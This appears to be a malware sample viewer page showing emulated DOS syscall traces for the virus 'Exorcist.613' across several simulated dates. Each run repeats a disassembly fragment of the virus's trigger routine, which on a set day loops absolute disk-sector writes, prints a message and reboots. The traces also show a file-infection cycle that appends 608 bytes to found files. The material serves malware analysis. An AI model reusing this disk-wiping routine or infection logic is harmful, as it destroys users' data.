Sample viewer

vx.netlux.org/Virus.DOS.Exorcist.613

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:32.69499381Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-17T23:10:32.697948483Z 26 PC: 12abc | Set disk transfer address
2018-12-17T23:10:32.699294822Z 71 PC: 12af6 | Get current directory
2018-12-17T23:10:32.701710588Z 78 PC: 12b22 | Find first file
2018-12-17T23:10:32.70622354Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.710738592Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.722757473Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.730407627Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.732278135Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.736783134Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.738045799Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.752401331Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.764804237Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.767791618Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.774936084Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.78947832Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.814221172Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.817111924Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.836291643Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.838031207Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.850379293Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.852636242Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.855598043Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.862035337Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.86979105Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.874080106Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.875388271Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.883886192Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.886052653Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.900731163Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.904380443Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.908012837Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.920047872Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.934861277Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.943081784Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.945136131Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.952836248Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.955317683Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.968063138Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.970894645Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.976145436Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.983459324Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.012670971Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.021827642Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.023952886Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.031370119Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.034385343Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.045507734Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.047928809Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.052054498Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.059001302Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.070027678Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.077951966Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.08360497Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.091531894Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.094063476Z 64 PC: 12bc4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:10:33.097254734Z 64 PC: 12bcf | Write file or device (Write 608 bytes on handle 5)
2018-12-17T23:10:33.106916005Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.108768913Z 64 PC: 12bda | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:10:33.116817629Z 87 PC: 12be1 | Get or set file date and time
2018-12-17T23:10:33.118837382Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.13089688Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.139311815Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.142202899Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.149131576Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.470988761Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.481896703Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.483725169Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.512596585Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.514665457Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.526424612Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.529557627Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.532990198Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.539559274Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.550520971Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.559618462Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.56156832Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.56900114Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.581352293Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.584290995Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.58896692Z 59 PC: 12b0e | Change current directory
2018-12-17T23:10:33.60016131Z 59 PC: 12b19 | Change current directory
2018-12-17T23:10:33.605341716Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.903991137Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-25T12:54:09.907159376Z 95 PC: 12a82 | Network redirection functions
2018-12-25T12:54:09.909706813Z 95 PC: 12a86 | Network redirection functions
2018-12-25T12:54:09.911813103Z 26 PC: 12abc | Set disk transfer address
2018-12-25T12:54:09.913230782Z 71 PC: 12af6 | Get current directory
2018-12-25T12:54:09.916452107Z 78 PC: 12b22 | Find first file
2018-12-25T12:54:09.919137325Z 59 PC: 12b0e | Change current directory
2018-12-25T12:54:09.921675484Z 59 PC: 12b19 | Change current directory
2018-12-25T12:54:09.93092134Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:10.051048752Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-25T12:54:10.055267831Z 26 PC: 12abc | Set disk transfer address
2018-12-25T12:54:10.056663022Z 71 PC: 12af6 | Get current directory
2018-12-25T12:54:10.060598708Z 78 PC: 12b22 | Find first file
2018-12-25T12:54:10.067503489Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:54:10.074818017Z 67 PC: 12c1e | Get or set file attributes
2018-12-25T12:54:10.09439093Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-25T12:54:10.119147611Z 87 PC: 12b7b | Get or set file date and time
2018-12-25T12:54:10.134054334Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:54:10.141586964Z 66 PC: 12c26 | Move file pointer
2018-12-25T12:54:10.143597164Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.15601125Z 62 PC: 12bf2 | Close file
2018-12-25T12:54:10.15837576Z 79 PC: 12b37 | Find next file
2018-12-25T12:54:10.161652915Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.168723539Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.180345165Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.188101239Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.190642985Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.198056678Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.199851625Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.211961566Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.214481651Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.218232546Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.224848462Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.236390254Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.248342053Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.2503084Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.258728078Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.261286408Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.272750917Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.276232275Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.279303173Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.285649916Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.297684304Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.30599633Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.307627433Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.315432502Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.317314188Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.32866686Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.331107237Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.334416161Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.341169309Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.35262652Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.36054773Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.362460545Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.370418678Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.373941139Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.385208173Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.38759835Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.391868103Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.398982662Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.410071622Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.41810157Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.41976639Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.427428436Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.430651744Z 64 PC: 12bc4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:54:10.435085228Z 64 PC: 12bcf | Write file or device (Write 608 bytes on handle 5)
2018-12-25T12:54:10.445164667Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.447287066Z 64 PC: 12bda | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:54:10.455590388Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:54:10.457753894Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.47019053Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.478543921Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.481556403Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.488041264Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.500694017Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.508844833Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.51083957Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.519183819Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.521521782Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.548962912Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.552070581Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.555124861Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.562309778Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.573320793Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.58165061Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.583487242Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.600905255Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.612660945Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.615029947Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.61792876Z 59 PC: 12b0e | Change current directory
2018-12-25T12:54:10.623790046Z 59 PC: 12b19 | Change current directory
2018-12-25T12:54:10.629273888Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:10.075719107Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0